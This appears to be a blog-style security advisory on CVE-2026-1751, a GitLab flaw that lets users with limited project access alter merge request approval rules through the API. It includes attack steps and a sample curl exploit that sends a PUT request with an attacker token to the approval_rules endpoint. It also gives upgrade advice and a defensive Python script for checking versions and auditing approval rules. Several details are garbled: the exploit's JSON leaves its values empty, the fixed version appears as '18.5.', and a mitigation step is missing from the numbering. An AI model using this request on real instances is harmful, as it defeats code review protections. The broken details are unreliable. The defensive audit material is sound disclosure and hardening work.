What Is CVE-2026-1751?
CVE-2026-1751 is a newly disclosed security vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The flaw affects all versions from 16.8 up to (but not including) 18.5. Under certain conditions it could let users without the required permission alter merge request approval rules, allowing code changes to be merged without the required review process.
If your team or company uses an impacted version, it's crucial to patch this as soon as possible.
Why Does It Matter?
GitLab’s merge request approval rules help teams enforce code quality and security by requiring certain people or groups to approve changes before they’re merged into important branches. If these rules are tampered with by unauthorized users, malicious or accidental code changes could go live without the right checks.
How Does the Vulnerability Work?
CVE-2026-1751 emerged from improper permission checks in some versions of GitLab. Under certain scenarios, an attacker who has at least limited access to a project *but not the required privilege to edit approval rules* could craft HTTP requests that would trick the backend into accepting unauthorized changes.
1. Gain Project Access: Get guest or developer access to a target repository.
2. Craft a Malicious Request: Use a REST client (like Postman or curl) to manually build requests that update or remove merge request approval rules.
3. Submit the Request: Send it directly to the vulnerable backend endpoint—bypassing the UI, which does enforce correct permissions.
4. Rule Changed: GitLab incorrectly saves the new rule, letting the attacker bypass normal review controls.
Sample Exploit Code
Below is a simple exploit example using curl. This assumes the attacker has a valid GitLab account and project access, but not enough to normally change approval rules.
```
curl -X PUT \
  -H "PRIVATE-TOKEN: <attacker_access_token>" \
  -H "Content-Type: application/json" \
  -d '{"approvals_required": , "approval_rules_attributes": [{"name": "Security", "approvals_required": }]}' \
  "https://gitlab.example.com/api/v4/projects/<project_id>/merge_requests/<mr_iid>/approval_rules/<rule_id>"
```
Note: Replace fields enclosed with angle brackets (< >) with real values like your target project ID, merge request IID, and approval rule ID.
On vulnerable versions, because the backend does not correctly check the caller's permissions, the approval rule is quietly changed.
1. Upgrade GitLab Now
The official fix is in GitLab 18.5. and above. Upgrade your instance as soon as possible.
Official GitLab release notes
- GitLab Security Release: 18.5.
3. Remove Unneeded Users
Reduce project access for people who do not need it. Because the issue is reachable by anyone with limited project access, the fewer accounts that hold even guest or developer roles, the smaller the exposure. The stricter you are with permissions, the safer your codebase will be.
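As an added example (not code from the advisory or from GitLab), the script below does the two checks a defender wants after reading this: it decides whether an instance's version string falls in the affected range the post gives (16.8 up to, but not including, 18.5), and it audits a project's approval rules against an expected baseline, flagging rules that require zero approvals, rules whose required count has been lowered, and expected rules that have disappeared. The sample `GET /version` and `GET /projects/:id/approval_rules` responses are constructed here to mirror the shape of those GitLab API endpoints and were not captured from a real instance; `fetch_json`, `BASELINE` and the sample data are this example's own names.

```python
"""Version and approval-rule audit for CVE-2026-1751 (added example, not from the post).

Assumptions: the affected range 16.8 <= version < 18.5 comes from the post;
SAMPLE_VERSION and SAMPLE_RULES are constructed data shaped like the
GitLab API responses for GET /version and GET /projects/:id/approval_rules.
"""
import json
import re
import urllib.request

AFFECTED_MIN = (16, 8)   # first affected minor release, per the post
FIXED_MIN = (18, 5)      # first fixed minor release, per the post


def parse_version(v: str) -> tuple:
    """Return (major, minor, patch) from strings such as '18.4.1-ee' or '18.5'."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {v!r}")
    return tuple(int(x) if x else 0 for x in m.groups())


def is_affected(v: str) -> bool:
    """True when the major.minor of v lies inside the affected range."""
    major_minor = parse_version(v)[:2]
    return AFFECTED_MIN <= major_minor < FIXED_MIN


def audit_rules(rules, baseline):
    """Compare live project approval rules with an expected baseline.

    rules:    list of dicts as returned by GET /projects/:id/approval_rules
    baseline: {rule_name: expected approvals_required}
    Returns a list of human-readable findings; an empty list means no drift.
    """
    findings = []
    seen = set()
    for r in rules:
        name = r.get("name", "<unnamed>")
        seen.add(name)
        required = r.get("approvals_required", 0)
        if required == 0:
            findings.append(f"rule {name!r} requires zero approvals")
        expected = baseline.get(name)
        if expected is not None and required != expected:
            findings.append(f"rule {name!r} requires {required}, baseline expects {expected}")
    for name in baseline:
        if name not in seen:
            findings.append(f"expected rule {name!r} is missing")
    return findings


def fetch_json(base_url: str, token: str, path: str):
    """GET a GitLab API path with a personal access token (not used offline)."""
    req = urllib.request.Request(f"{base_url.rstrip('/')}/api/v4{path}",
                                 headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


# Constructed sample data; not captured from a real instance.
SAMPLE_VERSION = {"version": "18.4.1-ee", "revision": "0000000"}
SAMPLE_RULES = [
    {"id": 1, "name": "Security", "approvals_required": 0, "rule_type": "regular"},
    {"id": 2, "name": "Code Owners", "approvals_required": 1, "rule_type": "code_owner"},
]
BASELINE = {"Security": 2, "Code Owners": 1, "Release Managers": 1}


if __name__ == "__main__":
    v = SAMPLE_VERSION["version"]
    print(f"GitLab {v}: {'AFFECTED' if is_affected(v) else 'not in affected range'}")
    for finding in audit_rules(SAMPLE_RULES, BASELINE):
        print("  -", finding)
```

Run it as-is to see the report on the constructed data; to audit a real project, replace the sample data with `fetch_json(url, token, "/version")` and `fetch_json(url, token, f"/projects/{project_id}/approval_rules")`. The baseline is the point: keep the expected rule set in version control or a configuration store so that drift in `approvals_required`, or a rule vanishing, shows up even when the change was made through the API rather than the UI.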
Additional References
- Official GitLab Advisory for CVE-2026-1751 (blog/gitlab documentation)
- CVE page on NIST *(may not be live yet)*
Short FAQ
Q: Was unauthorized code actually merged in the wild using this bug?
A: As of this writing, there are no public reports of real attacks, but the risk is significant.
Q: What branches are at risk?
A: Any branch with approval rules set is potentially vulnerable, especially main and protected branches.
Q: Why didn't the UI block me?
A: The UI enforces the correct permissions. The bypass only worked by sending requests directly to the backend API.
In Summary
CVE-2026-1751 is a big deal if you use GitLab and depend on merge request approvals for code safety.
Attackers could secretly weaken your code review process.
Fix: Upgrade to 18.5.+ and check your rules!
Timeline
Published on: 02/02/2026 09:04:38 UTC
Last modified on: 02/04/2026 14:34:06 UTC